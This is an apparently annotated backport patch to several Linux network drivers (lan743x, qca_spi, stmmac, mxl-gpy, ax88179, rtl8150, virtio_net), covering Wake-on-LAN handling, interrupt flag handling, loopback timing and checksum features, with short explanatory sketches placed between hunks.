++			   "PHY changed its supported WOL! old=%x, new=%x\n",
++			   adapter->phy_wol_supported, wol->supported);
++
++	wol->supported |= MAC_SUPPORTED_WAKES;
+ 
+ 	if (adapter->is_pci11x1x)
+ 		wol->supported |= WAKE_MAGICSECURE;
+@@ -1162,7 +1166,39 @@ static int lan743x_ethtool_set_wol(struct net_device *netdev,
+ {
+ 	struct lan743x_adapter *adapter = netdev_priv(netdev);
+ 
++	/* WAKE_MAGICSECURE is a modifier of, and only valid together with,
++	 * WAKE_MAGIC
++	 */
++	if ((wol->wolopts & WAKE_MAGICSECURE) && !(wol->wolopts & WAKE_MAGIC))
++		return -EINVAL;
++
++	if (netdev->phydev) {
++		struct ethtool_wolinfo phy_wol;
++		int ret;
++
++		phy_wol.wolopts = wol->wolopts & adapter->phy_wol_supported;
++
++		/* If WAKE_MAGICSECURE was requested, filter out WAKE_MAGIC
++		 * for PHYs that do not support WAKE_MAGICSECURE
++		 */
++		if (wol->wolopts & WAKE_MAGICSECURE &&
++		    !(adapter->phy_wol_supported & WAKE_MAGICSECURE))
++			phy_wol.wolopts &= ~WAKE_MAGIC;
++
++		ret = phy_ethtool_set_wol(netdev->phydev, &phy_wol);
++		if (ret && (ret != -EOPNOTSUPP))
++			return ret;
++
++		if (ret == -EOPNOTSUPP)
++			adapter->phy_wolopts = 0;
++		else
++			adapter->phy_wolopts = phy_wol.wolopts;
++	} else {
++		adapter->phy_wolopts = 0;
++	}
++
+ 	adapter->wolopts = 0;
++	wol->wolopts &= ~adapter->phy_wolopts;
+ 	if (wol->wolopts & WAKE_UCAST)
+ 		adapter->wolopts |= WAKE_UCAST;
+ 	if (wol->wolopts & WAKE_MCAST)
+@@ -1183,10 +1219,10 @@ static int lan743x_ethtool_set_wol(struct net_device *netdev,
+ 		memset(adapter->sopass, 0, sizeof(u8) * SOPASS_MAX);
+ 	}
+ 
++	wol->wolopts = adapter->wolopts | adapter->phy_wolopts;
+ 	device_set_wakeup_enable(&adapter->pdev->dev, (bool)wol->wolopts);
+ 
+-	return netdev->phydev ? phy_ethtool_set_wol(netdev->phydev, wol)
+-			: -ENETDOWN;
++	return 0;
+ }
+ #endif /* CONFIG_PM */
+ 
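
The set_wol rework above splits the requested wake options between the PHY (whatever it supports) and the MAC (everything else), tracking them in phy_wolopts and wolopts. The bit arithmetic in a self-contained program; the flag values mirror include/uapi/linux/ethtool.h and the PHY capability set is assumed:

#include <stdio.h>

#define WAKE_PHY	(1 << 0)
#define WAKE_UCAST	(1 << 1)
#define WAKE_MAGIC	(1 << 5)

int main(void)
{
	unsigned int requested = WAKE_MAGIC | WAKE_PHY | WAKE_UCAST;
	unsigned int phy_supported = WAKE_PHY | WAKE_MAGIC;	/* assumed PHY caps */

	/* Offer the PHY what it supports; the MAC handles the rest. */
	unsigned int phy_wolopts = requested & phy_supported;
	unsigned int mac_wolopts = requested & ~phy_wolopts;

	printf("PHY wakes 0x%x, MAC wakes 0x%x\n", phy_wolopts, mac_wolopts);
	return 0;
}
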
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.c b/drivers/net/ethernet/microchip/lan743x_main.c
+index d5123e8c4a9f4..0b2eaed110720 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.c
++++ b/drivers/net/ethernet/microchip/lan743x_main.c
+@@ -3056,6 +3056,17 @@ static int lan743x_netdev_open(struct net_device *netdev)
+ 		if (ret)
+ 			goto close_tx;
+ 	}
++
++#ifdef CONFIG_PM
++	if (adapter->netdev->phydev) {
++		struct ethtool_wolinfo wol = { .cmd = ETHTOOL_GWOL };
++
++		phy_ethtool_get_wol(netdev->phydev, &wol);
++		adapter->phy_wol_supported = wol.supported;
++		adapter->phy_wolopts = wol.wolopts;
++	}
++#endif
++
+ 	return 0;
+ 
+ close_tx:
+@@ -3513,7 +3524,7 @@ static void lan743x_pm_set_wol(struct lan743x_adapter *adapter)
+ 
+ 	/* clear wake settings */
+ 	pmtctl = lan743x_csr_read(adapter, PMT_CTL);
+-	pmtctl |= PMT_CTL_WUPS_MASK_;
++	pmtctl |= PMT_CTL_WUPS_MASK_ | PMT_CTL_RES_CLR_WKP_MASK_;
+ 	pmtctl &= ~(PMT_CTL_GPIO_WAKEUP_EN_ | PMT_CTL_EEE_WAKEUP_EN_ |
+ 		PMT_CTL_WOL_EN_ | PMT_CTL_MAC_D3_RX_CLK_OVR_ |
+ 		PMT_CTL_RX_FCT_RFE_D3_CLK_OVR_ | PMT_CTL_ETH_PHY_WAKE_EN_);
+@@ -3525,10 +3536,9 @@ static void lan743x_pm_set_wol(struct lan743x_adapter *adapter)
+ 
+ 	pmtctl |= PMT_CTL_ETH_PHY_D3_COLD_OVR_ | PMT_CTL_ETH_PHY_D3_OVR_;
+ 
+-	if (adapter->wolopts & WAKE_PHY) {
+-		pmtctl |= PMT_CTL_ETH_PHY_EDPD_PLL_CTL_;
++	if (adapter->phy_wolopts)
+ 		pmtctl |= PMT_CTL_ETH_PHY_WAKE_EN_;
+-	}
++
+ 	if (adapter->wolopts & WAKE_MAGIC) {
+ 		wucsr |= MAC_WUCSR_MPEN_;
+ 		macrx |= MAC_RX_RXEN_;
+@@ -3624,7 +3634,7 @@ static int lan743x_pm_suspend(struct device *dev)
+ 	lan743x_csr_write(adapter, MAC_WUCSR2, 0);
+ 	lan743x_csr_write(adapter, MAC_WK_SRC, 0xFFFFFFFF);
+ 
+-	if (adapter->wolopts)
++	if (adapter->wolopts || adapter->phy_wolopts)
+ 		lan743x_pm_set_wol(adapter);
+ 
+ 	if (adapter->is_pci11x1x) {
+@@ -3648,6 +3658,7 @@ static int lan743x_pm_resume(struct device *dev)
+ 	struct pci_dev *pdev = to_pci_dev(dev);
+ 	struct net_device *netdev = pci_get_drvdata(pdev);
+ 	struct lan743x_adapter *adapter = netdev_priv(netdev);
++	u32 data;
+ 	int ret;
+ 
+ 	pci_set_power_state(pdev, PCI_D0);
+@@ -3666,6 +3677,30 @@ static int lan743x_pm_resume(struct device *dev)
+ 		return ret;
+ 	}
+ 
++	ret = lan743x_csr_read(adapter, MAC_WK_SRC);
++	netif_dbg(adapter, drv, adapter->netdev,
++		  "Wakeup source : 0x%08X\n", ret);
++
++	/* Clear the wol configuration and status bits. Note that
++	 * the status bits are "Write One to Clear (W1C)"
++	 */
++	data = MAC_WUCSR_EEE_TX_WAKE_ | MAC_WUCSR_EEE_RX_WAKE_ |
++	       MAC_WUCSR_RFE_WAKE_FR_ | MAC_WUCSR_PFDA_FR_ | MAC_WUCSR_WUFR_ |
++	       MAC_WUCSR_MPR_ | MAC_WUCSR_BCAST_FR_;
++	lan743x_csr_write(adapter, MAC_WUCSR, data);
++
++	data = MAC_WUCSR2_NS_RCD_ | MAC_WUCSR2_ARP_RCD_ |
++	       MAC_WUCSR2_IPV6_TCPSYN_RCD_ | MAC_WUCSR2_IPV4_TCPSYN_RCD_;
++	lan743x_csr_write(adapter, MAC_WUCSR2, data);
++
++	data = MAC_WK_SRC_ETH_PHY_WK_ | MAC_WK_SRC_IPV6_TCPSYN_RCD_WK_ |
++	       MAC_WK_SRC_IPV4_TCPSYN_RCD_WK_ | MAC_WK_SRC_EEE_TX_WK_ |
++	       MAC_WK_SRC_EEE_RX_WK_ | MAC_WK_SRC_RFE_FR_WK_ |
++	       MAC_WK_SRC_PFDA_FR_WK_ | MAC_WK_SRC_MP_FR_WK_ |
++	       MAC_WK_SRC_BCAST_FR_WK_ | MAC_WK_SRC_WU_FR_WK_ |
++	       MAC_WK_SRC_WK_FR_SAVED_;
++	lan743x_csr_write(adapter, MAC_WK_SRC, data);
++
+ 	/* open netdev when netdev is at running state while resume.
+ 	 * For instance, it is true when system wakesup after pm-suspend
+ 	 * However, it is false when system wakes up after suspend GUI menu
+@@ -3674,9 +3709,6 @@ static int lan743x_pm_resume(struct device *dev)
+ 		lan743x_netdev_open(netdev);
+ 
+ 	netif_device_attach(netdev);
+-	ret = lan743x_csr_read(adapter, MAC_WK_SRC);
+-	netif_info(adapter, drv, adapter->netdev,
+-		   "Wakeup source : 0x%08X\n", ret);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/microchip/lan743x_main.h b/drivers/net/ethernet/microchip/lan743x_main.h
+index d304be17b9d82..92a5660b88202 100644
+--- a/drivers/net/ethernet/microchip/lan743x_main.h
++++ b/drivers/net/ethernet/microchip/lan743x_main.h
+@@ -61,6 +61,7 @@
+ #define PMT_CTL_RX_FCT_RFE_D3_CLK_OVR_		BIT(18)
+ #define PMT_CTL_GPIO_WAKEUP_EN_			BIT(15)
+ #define PMT_CTL_EEE_WAKEUP_EN_			BIT(13)
++#define PMT_CTL_RES_CLR_WKP_MASK_		GENMASK(9, 8)
+ #define PMT_CTL_READY_				BIT(7)
+ #define PMT_CTL_ETH_PHY_RST_			BIT(4)
+ #define PMT_CTL_WOL_EN_				BIT(3)
+@@ -227,12 +228,31 @@
+ #define MAC_WUCSR				(0x140)
+ #define MAC_MP_SO_EN_				BIT(21)
+ #define MAC_WUCSR_RFE_WAKE_EN_			BIT(14)
++#define MAC_WUCSR_EEE_TX_WAKE_			BIT(13)
++#define MAC_WUCSR_EEE_RX_WAKE_			BIT(11)
++#define MAC_WUCSR_RFE_WAKE_FR_			BIT(9)
++#define MAC_WUCSR_PFDA_FR_			BIT(7)
++#define MAC_WUCSR_WUFR_				BIT(6)
++#define MAC_WUCSR_MPR_				BIT(5)
++#define MAC_WUCSR_BCAST_FR_			BIT(4)
+ #define MAC_WUCSR_PFDA_EN_			BIT(3)
+ #define MAC_WUCSR_WAKE_EN_			BIT(2)
+ #define MAC_WUCSR_MPEN_				BIT(1)
+ #define MAC_WUCSR_BCST_EN_			BIT(0)
+ 
+ #define MAC_WK_SRC				(0x144)
++#define MAC_WK_SRC_ETH_PHY_WK_			BIT(17)
++#define MAC_WK_SRC_IPV6_TCPSYN_RCD_WK_		BIT(16)
++#define MAC_WK_SRC_IPV4_TCPSYN_RCD_WK_		BIT(15)
++#define MAC_WK_SRC_EEE_TX_WK_			BIT(14)
++#define MAC_WK_SRC_EEE_RX_WK_			BIT(13)
++#define MAC_WK_SRC_RFE_FR_WK_			BIT(12)
++#define MAC_WK_SRC_PFDA_FR_WK_			BIT(11)
++#define MAC_WK_SRC_MP_FR_WK_			BIT(10)
++#define MAC_WK_SRC_BCAST_FR_WK_			BIT(9)
++#define MAC_WK_SRC_WU_FR_WK_			BIT(8)
++#define MAC_WK_SRC_WK_FR_SAVED_			BIT(7)
++
+ #define MAC_MP_SO_HI				(0x148)
+ #define MAC_MP_SO_LO				(0x14C)
+ 
+@@ -295,6 +315,10 @@
+ #define RFE_INDX(index)			(0x580 + (index << 2))
+ 
+ #define MAC_WUCSR2			(0x600)
++#define MAC_WUCSR2_NS_RCD_		BIT(7)
++#define MAC_WUCSR2_ARP_RCD_		BIT(6)
++#define MAC_WUCSR2_IPV6_TCPSYN_RCD_	BIT(5)
++#define MAC_WUCSR2_IPV4_TCPSYN_RCD_	BIT(4)
+ 
+ #define SGMII_ACC			(0x720)
+ #define SGMII_ACC_SGMII_BZY_		BIT(31)
+@@ -1010,6 +1034,8 @@ enum lan743x_sgmii_lsd {
+ 	LINK_2500_SLAVE
+ };
+ 
++#define MAC_SUPPORTED_WAKES  (WAKE_BCAST | WAKE_UCAST | WAKE_MCAST | \
++			      WAKE_MAGIC | WAKE_ARP)
+ struct lan743x_adapter {
+ 	struct net_device       *netdev;
+ 	struct mii_bus		*mdiobus;
+@@ -1017,6 +1043,8 @@ struct lan743x_adapter {
+ #ifdef CONFIG_PM
+ 	u32			wolopts;
+ 	u8			sopass[SOPASS_MAX];
++	u32			phy_wolopts;
++	u32			phy_wol_supported;
+ #endif
+ 	struct pci_dev		*pdev;
+ 	struct lan743x_csr      csr;
+diff --git a/drivers/net/ethernet/qualcomm/qca_debug.c b/drivers/net/ethernet/qualcomm/qca_debug.c
+index a739c06ede4e7..972d8f52c5a21 100644
+--- a/drivers/net/ethernet/qualcomm/qca_debug.c
++++ b/drivers/net/ethernet/qualcomm/qca_debug.c
+@@ -111,10 +111,8 @@ qcaspi_info_show(struct seq_file *s, void *what)
+ 
+ 	seq_printf(s, "IRQ              : %d\n",
+ 		   qca->spi_dev->irq);
+-	seq_printf(s, "INTR REQ         : %u\n",
+-		   qca->intr_req);
+-	seq_printf(s, "INTR SVC         : %u\n",
+-		   qca->intr_svc);
++	seq_printf(s, "INTR             : %lx\n",
++		   qca->intr);
+ 
+ 	seq_printf(s, "SPI max speed    : %lu\n",
+ 		   (unsigned long)qca->spi_dev->max_speed_hz);
+diff --git a/drivers/net/ethernet/qualcomm/qca_spi.c b/drivers/net/ethernet/qualcomm/qca_spi.c
+index 82f5173a2cfd5..926a087ae1c62 100644
+--- a/drivers/net/ethernet/qualcomm/qca_spi.c
++++ b/drivers/net/ethernet/qualcomm/qca_spi.c
+@@ -49,6 +49,8 @@
+ 
+ #define MAX_DMA_BURST_LEN 5000
+ 
++#define SPI_INTR 0
++
+ /*   Modules parameters     */
+ #define QCASPI_CLK_SPEED_MIN 1000000
+ #define QCASPI_CLK_SPEED_MAX 16000000
+@@ -593,14 +595,14 @@ qcaspi_spi_thread(void *data)
+ 			continue;
+ 		}
+ 
+-		if ((qca->intr_req == qca->intr_svc) &&
++		if (!test_bit(SPI_INTR, &qca->intr) &&
+ 		    !qca->txr.skb[qca->txr.head])
+ 			schedule();
+ 
+ 		set_current_state(TASK_RUNNING);
+ 
+-		netdev_dbg(qca->net_dev, "have work to do. int: %d, tx_skb: %p\n",
+-			   qca->intr_req - qca->intr_svc,
++		netdev_dbg(qca->net_dev, "have work to do. int: %lu, tx_skb: %p\n",
++			   qca->intr,
+ 			   qca->txr.skb[qca->txr.head]);
+ 
+ 		qcaspi_qca7k_sync(qca, QCASPI_EVENT_UPDATE);
+@@ -614,8 +616,7 @@ qcaspi_spi_thread(void *data)
+ 			msleep(QCASPI_QCA7K_REBOOT_TIME_MS);
+ 		}
+ 
+-		if (qca->intr_svc != qca->intr_req) {
+-			qca->intr_svc = qca->intr_req;
++		if (test_and_clear_bit(SPI_INTR, &qca->intr)) {
+ 			start_spi_intr_handling(qca, &intr_cause);
+ 
+ 			if (intr_cause & SPI_INT_CPU_ON) {
+@@ -677,7 +678,7 @@ qcaspi_intr_handler(int irq, void *data)
+ {
+ 	struct qcaspi *qca = data;
+ 
+-	qca->intr_req++;
++	set_bit(SPI_INTR, &qca->intr);
+ 	if (qca->spi_thread)
+ 		wake_up_process(qca->spi_thread);
+ 
+@@ -693,8 +694,7 @@ qcaspi_netdev_open(struct net_device *dev)
+ 	if (!qca)
+ 		return -EINVAL;
+ 
+-	qca->intr_req = 1;
+-	qca->intr_svc = 0;
++	set_bit(SPI_INTR, &qca->intr);
+ 	qca->sync = QCASPI_SYNC_UNKNOWN;
+ 	qcafrm_fsm_init_spi(&qca->frm_handle);
+ 
+diff --git a/drivers/net/ethernet/qualcomm/qca_spi.h b/drivers/net/ethernet/qualcomm/qca_spi.h
+index 3067356106f0b..58ad910068d4b 100644
+--- a/drivers/net/ethernet/qualcomm/qca_spi.h
++++ b/drivers/net/ethernet/qualcomm/qca_spi.h
+@@ -93,8 +93,7 @@ struct qcaspi {
+ 	struct qcafrm_handle frm_handle;
+ 	struct sk_buff *rx_skb;
+ 
+-	unsigned int intr_req;
+-	unsigned int intr_svc;
++	unsigned long intr;
+ 	u16 reset_count;
+ 
+ #ifdef CONFIG_DEBUG_FS
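
The qca_spi change replaces the intr_req/intr_svc counter pair with a single atomic bit: the IRQ handler sets it, the thread consumes it with test_and_clear_bit(), and multiple IRQs before the thread runs collapse into one pass. A kernel-context sketch of the handshake (not a standalone program; names are invented):

#include <linux/bitops.h>
#include <linux/interrupt.h>
#include <linux/sched.h>

#define SPI_INTR 0

static unsigned long intr_flags;
static struct task_struct *spi_thread;

/* IRQ handler: publish "interrupt pending" atomically and kick the thread. */
static irqreturn_t my_intr_handler(int irq, void *data)
{
	set_bit(SPI_INTR, &intr_flags);
	wake_up_process(spi_thread);
	return IRQ_HANDLED;
}

/* Worker: consume the flag exactly once per batch of interrupts, so the
 * wraparound hazards of a counter pair cannot occur. */
static void my_thread_iteration(void)
{
	if (test_and_clear_bit(SPI_INTR, &intr_flags)) {
		/* read and handle all accumulated interrupt causes */
	}
}
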
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
+index 8b50f03056b7b..c0150c5d4781d 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_hwtstamp.c
+@@ -176,6 +176,7 @@ static void timestamp_interrupt(struct stmmac_priv *priv)
+ {
+ 	u32 num_snapshot, ts_status, tsync_int;
+ 	struct ptp_clock_event event;
++	u32 acr_value, channel;
+ 	unsigned long flags;
+ 	u64 ptp_time;
+ 	int i;
+@@ -201,12 +202,15 @@ static void timestamp_interrupt(struct stmmac_priv *priv)
+ 	num_snapshot = (ts_status & GMAC_TIMESTAMP_ATSNS_MASK) >>
+ 		       GMAC_TIMESTAMP_ATSNS_SHIFT;
+ 
++	acr_value = readl(priv->ptpaddr + PTP_ACR);
++	channel = ilog2(FIELD_GET(PTP_ACR_MASK, acr_value));
++
+ 	for (i = 0; i < num_snapshot; i++) {
+ 		read_lock_irqsave(&priv->ptp_lock, flags);
+ 		get_ptptime(priv->ptpaddr, &ptp_time);
+ 		read_unlock_irqrestore(&priv->ptp_lock, flags);
+ 		event.type = PTP_CLOCK_EXTTS;
+-		event.index = 0;
++		event.index = channel;
+ 		event.timestamp = ptp_time;
+ 		ptp_clock_event(priv->ptp_clock, &event);
+ 	}
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+index 074ff289eaf25..5eb8c6713e456 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_tc.c
+@@ -358,24 +358,28 @@ static int tc_setup_cbs(struct stmmac_priv *priv,
+ 
+ 	port_transmit_rate_kbps = qopt->idleslope - qopt->sendslope;
+ 
+-	/* Port Transmit Rate and Speed Divider */
+-	switch (div_s64(port_transmit_rate_kbps, 1000)) {
+-	case SPEED_10000:
+-	case SPEED_5000:
+-		ptr = 32;
+-		break;
+-	case SPEED_2500:
+-	case SPEED_1000:
+-		ptr = 8;
+-		break;
+-	case SPEED_100:
+-		ptr = 4;
+-		break;
+-	default:
+-		netdev_err(priv->dev,
+-			   "Invalid portTransmitRate %lld (idleSlope - sendSlope)\n",
+-			   port_transmit_rate_kbps);
+-		return -EINVAL;
++	if (qopt->enable) {
++		/* Port Transmit Rate and Speed Divider */
++		switch (div_s64(port_transmit_rate_kbps, 1000)) {
++		case SPEED_10000:
++		case SPEED_5000:
++			ptr = 32;
++			break;
++		case SPEED_2500:
++		case SPEED_1000:
++			ptr = 8;
++			break;
++		case SPEED_100:
++			ptr = 4;
++			break;
++		default:
++			netdev_err(priv->dev,
++				   "Invalid portTransmitRate %lld (idleSlope - sendSlope)\n",
++				   port_transmit_rate_kbps);
++			return -EINVAL;
++		}
++	} else {
++		ptr = 0;
+ 	}
+ 
+ 	mode_to_use = priv->plat->tx_queues_cfg[queue].mode_to_use;
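
The tc_setup_cbs() hunk only maps the transmit rate to a speed divider when CBS is being enabled; on disable, idleslope and sendslope are both zero, so the rate no longer identifies a link speed and the old switch would fail. The decision as a compilable function (rates in kbps, as in the driver):

#include <stdio.h>

#define SPEED_100	100
#define SPEED_1000	1000
#define SPEED_2500	2500
#define SPEED_5000	5000
#define SPEED_10000	10000

/* Returns the divider, 0 when disabling, or -1 for an unknown rate. */
static int cbs_speed_divider(int enable, long long rate_kbps)
{
	if (!enable)
		return 0;
	switch (rate_kbps / 1000) {
	case SPEED_10000:
	case SPEED_5000:
		return 32;
	case SPEED_2500:
	case SPEED_1000:
		return 8;
	case SPEED_100:
		return 4;
	default:
		return -1;
	}
}

int main(void)
{
	printf("1G: %d, 100M: %d, disable: %d\n",
	       cbs_speed_divider(1, 1000000),
	       cbs_speed_divider(1, 100000),
	       cbs_speed_divider(0, 0));
	return 0;
}
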
+diff --git a/drivers/net/phy/mxl-gpy.c b/drivers/net/phy/mxl-gpy.c
+index cae24091fb6f7..f07760e0455d5 100644
+--- a/drivers/net/phy/mxl-gpy.c
++++ b/drivers/net/phy/mxl-gpy.c
+@@ -95,6 +95,14 @@ struct gpy_priv {
+ 
+ 	u8 fw_major;
+ 	u8 fw_minor;
++	u32 wolopts;
++
++	/* After switching out of loopback mode, the PHY needs 3 seconds
++	 * before it can safely re-enter loopback mode. Record the time when
++	 * loopback is disabled. Check and wait if necessary before loopback
++	 * is enabled.
++	 */
++	u64 lb_dis_to;
+ };
+ 
+ static const struct {
+@@ -202,6 +210,15 @@ static int gpy_hwmon_register(struct phy_device *phydev)
+ }
+ #endif
+ 
++static int gpy_ack_interrupt(struct phy_device *phydev)
++{
++	int ret;
++
++	/* Clear all pending interrupts */
++	ret = phy_read(phydev, PHY_ISTAT);
++	return ret < 0 ? ret : 0;
++}
++
+ static int gpy_mbox_read(struct phy_device *phydev, u32 addr)
+ {
+ 	struct gpy_priv *priv = phydev->priv;
+@@ -243,16 +260,8 @@ static int gpy_mbox_read(struct phy_device *phydev, u32 addr)
+ 
+ static int gpy_config_init(struct phy_device *phydev)
+ {
+-	int ret;
+-
+-	/* Mask all interrupts */
+-	ret = phy_write(phydev, PHY_IMASK, 0);
+-	if (ret)
+-		return ret;
+-
+-	/* Clear all pending interrupts */
+-	ret = phy_read(phydev, PHY_ISTAT);
+-	return ret < 0 ? ret : 0;
++	/* Nothing to configure. Configuration Requirement Placeholder */
++	return 0;
+ }
+ 
+ static bool gpy_has_broken_mdint(struct phy_device *phydev)
+@@ -533,11 +542,23 @@ static int gpy_read_status(struct phy_device *phydev)
+ 
+ static int gpy_config_intr(struct phy_device *phydev)
+ {
++	struct gpy_priv *priv = phydev->priv;
+ 	u16 mask = 0;
++	int ret;
++
++	ret = gpy_ack_interrupt(phydev);
++	if (ret)
++		return ret;
+ 
+ 	if (phydev->interrupts == PHY_INTERRUPT_ENABLED)
+ 		mask = PHY_IMASK_MASK;
+ 
++	if (priv->wolopts & WAKE_MAGIC)
++		mask |= PHY_IMASK_WOL;
++
++	if (priv->wolopts & WAKE_PHY)
++		mask |= PHY_IMASK_LSTC;
++
+ 	return phy_write(phydev, PHY_IMASK, mask);
+ }
+ 
+@@ -586,6 +607,7 @@ static int gpy_set_wol(struct phy_device *phydev,
+ 		       struct ethtool_wolinfo *wol)
+ {
+ 	struct net_device *attach_dev = phydev->attached_dev;
++	struct gpy_priv *priv = phydev->priv;
+ 	int ret;
+ 
+ 	if (wol->wolopts & WAKE_MAGIC) {
+@@ -633,6 +655,8 @@ static int gpy_set_wol(struct phy_device *phydev,
+ 		ret = phy_read(phydev, PHY_ISTAT);
+ 		if (ret < 0)
+ 			return ret;
++
++		priv->wolopts |= WAKE_MAGIC;
+ 	} else {
+ 		/* Disable magic packet matching */
+ 		ret = phy_clear_bits_mmd(phydev, MDIO_MMD_VEND2,
+@@ -640,6 +664,13 @@ static int gpy_set_wol(struct phy_device *phydev,
+ 					 WOL_EN);
+ 		if (ret < 0)
+ 			return ret;
++
++		/* Disable the WOL interrupt */
++		ret = phy_clear_bits(phydev, PHY_IMASK, PHY_IMASK_WOL);
++		if (ret < 0)
++			return ret;
++
++		priv->wolopts &= ~WAKE_MAGIC;
+ 	}
+ 
+ 	if (wol->wolopts & WAKE_PHY) {
+@@ -656,9 +687,11 @@ static int gpy_set_wol(struct phy_device *phydev,
+ 		if (ret & (PHY_IMASK_MASK & ~PHY_IMASK_LSTC))
+ 			phy_trigger_machine(phydev);
+ 
++		priv->wolopts |= WAKE_PHY;
+ 		return 0;
+ 	}
+ 
++	priv->wolopts &= ~WAKE_PHY;
+ 	/* Disable the link state change interrupt */
+ 	return phy_clear_bits(phydev, PHY_IMASK, PHY_IMASK_LSTC);
+ }
+@@ -666,34 +699,42 @@ static int gpy_set_wol(struct phy_device *phydev,
+ static void gpy_get_wol(struct phy_device *phydev,
+ 			struct ethtool_wolinfo *wol)
+ {
+-	int ret;
++	struct gpy_priv *priv = phydev->priv;
+ 
+ 	wol->supported = WAKE_MAGIC | WAKE_PHY;
+-	wol->wolopts = 0;
+-
+-	ret = phy_read_mmd(phydev, MDIO_MMD_VEND2, VPSPEC2_WOL_CTL);
+-	if (ret & WOL_EN)
+-		wol->wolopts |= WAKE_MAGIC;
+-
+-	ret = phy_read(phydev, PHY_IMASK);
+-	if (ret & PHY_IMASK_LSTC)
+-		wol->wolopts |= WAKE_PHY;
++	wol->wolopts = priv->wolopts;
+ }
+ 
+ static int gpy_loopback(struct phy_device *phydev, bool enable)
+ {
++	struct gpy_priv *priv = phydev->priv;
++	u16 set = 0;
+ 	int ret;
+ 
+-	ret = phy_modify(phydev, MII_BMCR, BMCR_LOOPBACK,
+-			 enable ? BMCR_LOOPBACK : 0);
+-	if (!ret) {
+-		/* It takes some time for PHY device to switch
+-		 * into/out-of loopback mode.
++	if (enable) {
++		u64 now = get_jiffies_64();
++
++		/* wait until 3 seconds from last disable */
++		if (time_before64(now, priv->lb_dis_to))
++			msleep(jiffies64_to_msecs(priv->lb_dis_to - now));
++
++		set = BMCR_LOOPBACK;
++	}
++
++	ret = phy_modify(phydev, MII_BMCR, BMCR_LOOPBACK, set);
++	if (ret <= 0)
++		return ret;
++
++	if (enable) {
++		/* It takes some time for PHY device to switch into
++		 * loopback mode.
+ 		 */
+ 		msleep(100);
++	} else {
++		priv->lb_dis_to = get_jiffies_64() + HZ * 3;
+ 	}
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int gpy115_loopback(struct phy_device *phydev, bool enable)
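
The gpy_loopback() rework above implements a cool-down: leaving loopback stamps a jiffies64 deadline, and re-entering sleeps out whatever remains of it. A kernel-context sketch of just that throttle (LB_COOLDOWN and the function names are assumptions):

#include <linux/jiffies.h>
#include <linux/delay.h>

#define LB_COOLDOWN	(3 * HZ)	/* assumed: 3 s, per the comment above */

static u64 lb_dis_to;	/* deadline recorded when loopback was left */

static void my_enter_loopback(void)
{
	u64 now = get_jiffies_64();

	/* Sleep out whatever remains of the cool-down window. */
	if (time_before64(now, lb_dis_to))
		msleep(jiffies64_to_msecs(lb_dis_to - now));
	/* ... set BMCR_LOOPBACK here ... */
}

static void my_leave_loopback(void)
{
	/* ... clear BMCR_LOOPBACK here ... */
	lb_dis_to = get_jiffies_64() + LB_COOLDOWN;
}
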
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 6d31061818e93..53f6efc22f5c9 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -174,7 +174,6 @@ struct ax88179_data {
+ 	u32 wol_supported;
+ 	u32 wolopts;
+ 	u8 disconnecting;
+-	u8 initialized;
+ };
+ 
+ struct ax88179_int_data {
+@@ -1676,12 +1675,21 @@ static int ax88179_reset(struct usbnet *dev)
+ 
+ static int ax88179_net_reset(struct usbnet *dev)
+ {
+-	struct ax88179_data *ax179_data = dev->driver_priv;
++	u16 tmp16;
+ 
+-	if (ax179_data->initialized)
++	ax88179_read_cmd(dev, AX_ACCESS_PHY, AX88179_PHY_ID, GMII_PHY_PHYSR,
++			 2, &tmp16);
++	if (tmp16) {
++		ax88179_read_cmd(dev, AX_ACCESS_MAC, AX_MEDIUM_STATUS_MODE,
++				 2, 2, &tmp16);
++		if (!(tmp16 & AX_MEDIUM_RECEIVE_EN)) {
++			tmp16 |= AX_MEDIUM_RECEIVE_EN;
++			ax88179_write_cmd(dev, AX_ACCESS_MAC, AX_MEDIUM_STATUS_MODE,
++					  2, 2, &tmp16);
++		}
++	} else {
+ 		ax88179_reset(dev);
+-	else
+-		ax179_data->initialized = 1;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/usb/rtl8150.c b/drivers/net/usb/rtl8150.c
+index 97afd7335d868..01a3b2417a540 100644
+--- a/drivers/net/usb/rtl8150.c
++++ b/drivers/net/usb/rtl8150.c
+@@ -778,7 +778,8 @@ static int rtl8150_get_link_ksettings(struct net_device *netdev,
+ 				      struct ethtool_link_ksettings *ecmd)
+ {
+ 	rtl8150_t *dev = netdev_priv(netdev);
+-	short lpa, bmcr;
++	short lpa = 0;
++	short bmcr = 0;
+ 	u32 supported;
+ 
+ 	supported = (SUPPORTED_10baseT_Half |
+diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
+index 32cddb633793d..61cc0ed1ddc13 100644
+--- a/drivers/net/virtio_net.c
++++ b/drivers/net/virtio_net.c
+@@ -3818,8 +3818,16 @@ static int virtnet_probe(struct virtio_device *vdev)
+ 			dev->features |= dev->hw_features & NETIF_F_ALL_TSO;
+ 		/* (!csum && gso) case will be fixed by register_netdev() */
+ 	}
+-	if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_CSUM))
+-		dev->features |= NETIF_F_RXCSUM;
++
++	/* 1. With VIRTIO_NET_F_GUEST_CSUM negotiation, the driver doesn't
++	 * need to calculate checksums for partially checksummed packets,
++	 * as they're considered valid by the upper layer.
++	 * 2. Without VIRTIO_NET_F_GUEST_CSUM negotiation, the driver only
++	 * receives fully checksummed packets. The device may assist in
++	 * validating these packets' checksums, so the driver won't have to.
++	 */
++	dev->features |= NETIF_F_RXCSUM;
++
+ 	if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_TSO4) ||
+ 	    virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_TSO6))
